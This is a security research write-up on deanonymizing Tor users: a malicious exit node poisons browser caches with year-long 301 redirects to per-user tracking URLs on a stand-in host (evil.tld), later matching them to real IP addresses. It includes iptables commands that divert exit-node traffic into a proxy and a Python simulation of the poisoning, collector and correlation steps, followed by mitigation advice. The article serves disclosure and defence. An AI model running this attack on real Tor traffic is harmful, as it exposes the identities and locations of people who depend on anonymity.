Identifying the real IP addresses of Tor users via browser cache poisoning
This article describes a practical use of the "cache poisoning through 301 redirect" attack, which a malicious Tor exit node can use to identify the real IP addresses of selected users.
IP address of the Tor exit node: 51.38.150.126
Transparent Reverse Proxy: tor.modlishka.io (Modlishka - updated code to be released.)
Note: In this scenario, the Chrome browser was configured to use the Tor network through its SOCKS5 proxy, and the Tor circuit was pinned to a specific test exit node: 51.38.150.126. This is a proof of concept; many of the settings can be optimized further.
On the malicious Tor exit node, all outgoing plain-HTTP traffic is redirected through the Modlishka proxy server. The traffic is generated locally by the Tor daemon, so it is rewritten in the OUTPUT chain of the nat table (the DNAT target is only valid in the nat table):
iptables -t nat -A OUTPUT -p tcp -m tcp --dport 80 -j DNAT --to-destination ip_address:80
iptables -A FORWARD -j ACCEPT
Attack scenario description
Assumptions:
A browser (in this case a standard browser, not the Tor Browser) that connects through the Tor network, with the circuit ultimately passing through the malicious exit node.
A malicious Tor exit node that intercepts all HTTP traffic not protected by TLS and poisons the browser cache by answering with HTTP 301 (Moved Permanently) responses.
Let's consider the following steps of the attack scenario:
The user connects to the Internet through Tor, either by configuring the browser to use Tor's SOCKS5 proxy, or by routing all operating system traffic through the Tor network.
The user starts a normal browsing session with a favorite browser; typically a lot of plain HTTP traffic (without TLS) is sent through the Tor tunnel.
The malicious Tor exit node intercepts every plain-HTTP request and answers it with an HTTP 301 redirect. Browsers cache 301 responses persistently, so the redirect target, a tracking URL carrying an identifier assigned to this Tor client, is stored in the cache. The tracking URL can be constructed as user-identifier.evil.tld, where evil.tld records the source IP address of every request and then redirects the user either to the originally requested host, or alternatively to a transparent reverse proxy that tries to intercept all subsequent HTTP traffic from the client. Since the cache can be poisoned automatically for most popular domains (as described in the previous article), for example the top 100 sites in Alexa's statistics, the attacker maximizes the chance of identifying real IP addresses.
After ending the Tor session, the user switches back to the regular (non-Tor) network connection.
As soon as the user types one of the previously poisoned domains into the address bar (for example "google.com"), the browser serves the cached 301 and redirects internally to the tracking URL containing the identifier assigned by the exit node.
The exit node operator can then match the previously intercepted HTTP request with the user's real IP address, using the information collected by the external host that received the request for the tracking URL with that user ID. The evil.tld host has a record of every IP address that accessed each tracking URL.
This method lets the exit node operator effectively match selected HTTP requests with client IP addresses. It works because the generated tracking URL is requested by the client first through the Tor tunnel and then again, once the connection goes through the user's regular ISP connection, all because of the poisoned cache entry.
Another approach is to inject modified JavaScript with embedded tracking URLs into plain-HTTP responses and set the necessary cache-control headers (e.g. 'Cache-Control: max-age=31536000'). However, this approach is not very effective.
Tracking users through the standard cookies of various web applications is also possible, but it is very difficult to force the client to visit the attacker-controlled domain twice: first when connecting through the malicious Tor exit node, and again after switching to the standard ISP connection.
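The flow above, as an added simulation that is not Modlishka or the author's code: the exit node side builds the cacheable 301 (one identifier per circuit, each host poisoned once per circuit so the client is not caught in a redirect loop when the collector bounces it back), the collector side logs the source address behind the identifier and sends the client on with a non-cacheable 302, and the correlation step joins the Tor-side and ISP-side hits. The collector name evil.tld, the 16-hex-digit identifier, the URL layout http://<id>.evil.tld/<original host>/<path> and the log format are assumptions; the sample addresses are constructed.

```python
"""Simulation of the 301 cache-poisoning deanonymization flow.

Added example, not Modlishka or the author's code. The collector domain
evil.tld, the 16-hex-digit client identifier, the URL layout
http://<id>.evil.tld/<original host>/<path> and the log format are assumptions.
"""
import re
import secrets
from dataclasses import dataclass
from typing import Optional
from urllib.parse import urlsplit

TRACKING_DOMAIN = "evil.tld"   # attacker-controlled collector (assumed name)
ONE_YEAR = 31536000            # max-age that keeps the 301 in the browser cache


def poison_response(original_url: str, client_id: str) -> tuple:
    """Response the malicious exit node returns instead of the real page.

    Browsers treat 301 as permanent and cache it; the explicit Cache-Control
    keeps it there for a year, so the next visit to the host, even outside
    Tor, is silently routed through the tracking domain.
    """
    u = urlsplit(original_url)
    if u.scheme != "http":
        raise ValueError("only plain HTTP can be rewritten by an exit node")
    path = u.path or "/"
    if u.query:
        path += "?" + u.query
    location = f"http://{client_id}.{TRACKING_DOMAIN}/{u.netloc}{path}"
    return 301, {"Location": location,
                 "Cache-Control": f"public, max-age={ONE_YEAR}"}


class ExitNode:
    """Simulated malicious exit node: one identifier per Tor circuit."""

    def __init__(self) -> None:
        self._ids = {}           # circuit key -> client id
        self._poisoned = set()   # (client id, host) already redirected once
        self.captured = []       # (client id, url) requests seen over Tor

    def circuit_id(self, circuit: str) -> str:
        return self._ids.setdefault(circuit, secrets.token_hex(8))

    def intercept(self, circuit: str, url: str) -> Optional[tuple]:
        """Return the poisoning response, or None to pass the request through."""
        cid = self.circuit_id(circuit)
        host = urlsplit(url).netloc.lower()
        self.captured.append((cid, url))
        if (cid, host) in self._poisoned:
            # Poison each host once per circuit; the collector bounces the
            # client straight back here, and a second 301 would loop.
            return None
        self._poisoned.add((cid, host))
        return poison_response(url, cid)


@dataclass
class Hit:
    client_id: str
    remote_addr: str
    original_host: str


_HOST_RE = re.compile(rf"^([0-9a-f]{{16}})\.{re.escape(TRACKING_DOMAIN)}$")


def collector(host_header: str, path: str, remote_addr: str, log: list) -> tuple:
    """evil.tld side: log who asked, then send them on to the real site."""
    m = _HOST_RE.match(host_header.lower())
    if not m:
        return 404, {}
    original_host, _, rest = path.lstrip("/").partition("/")
    log.append(Hit(m.group(1), remote_addr, original_host))
    # 302 with no-store, never 301: if this hop were cached the browser
    # would skip evil.tld next time and the collector would learn nothing.
    return 302, {"Location": f"http://{original_host}/{rest}",
                 "Cache-Control": "no-store"}


def correlate(log: list, tor_exit_ips: set) -> dict:
    """Map each client id to the non-Tor addresses that later hit its URL.

    The first hit arrives through Tor (source = some exit node); the hit made
    after the user leaves Tor carries the real ISP address. In practice
    tor_exit_ips would be the published exit-node list, not a single IP.
    """
    real = {}
    for h in log:
        if h.remote_addr in tor_exit_ips:
            continue
        real.setdefault(h.client_id, set()).add(h.remote_addr)
    return real


if __name__ == "__main__":
    node, log = ExitNode(), []
    status, hdrs = node.intercept("circuit-A", "http://example.com/index.html")
    cid = node.circuit_id("circuit-A")
    # constructed traffic: first via the exit node 51.38.150.126, then via the ISP
    collector(f"{cid}.{TRACKING_DOMAIN}", "/example.com/index.html", "51.38.150.126", log)
    collector(f"{cid}.{TRACKING_DOMAIN}", "/example.com/index.html", "203.0.113.7", log)
    print(status, hdrs["Location"], correlate(log, {"51.38.150.126"}))
```

The two status codes are the whole trick: the hop the victim should keep is a 301 with a long max-age, the hop the attacker needs to observe every time is a 302 with no-store. Swapping them breaks the attack either way.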
Findings
An attacker can make persistent changes to the browser cache by injecting poisoned responses from a malicious exit node, and thereby identify the real IP addresses of Tor users who send HTTP traffic without TLS.
Poisoning a significant number of popular domain names increases the likelihood of receiving a return HTTP request (with the assigned user ID) that reveals the user's real IP address. One can also try to hijack the domain for some browser clients and hope that the "typo" in the domain name is not noticed by the user, or is not displayed at all (for example, in mobile application WebViews).
Ways to reduce risk:
When connecting to the Internet via Tor, make sure that all traffic not protected by TLS is blocked. Browser plug-ins that enforce HTTPS-only connections are available for both Firefox and Chrome.
In addition, always use the browser's "private" mode when connecting via Tor, so that nothing cached during the session survives it.
Do not route the traffic of your entire operating system through Tor until you are sure that all outgoing traffic uses TLS.
If possible, always use the latest version of the Tor browser to browse the web.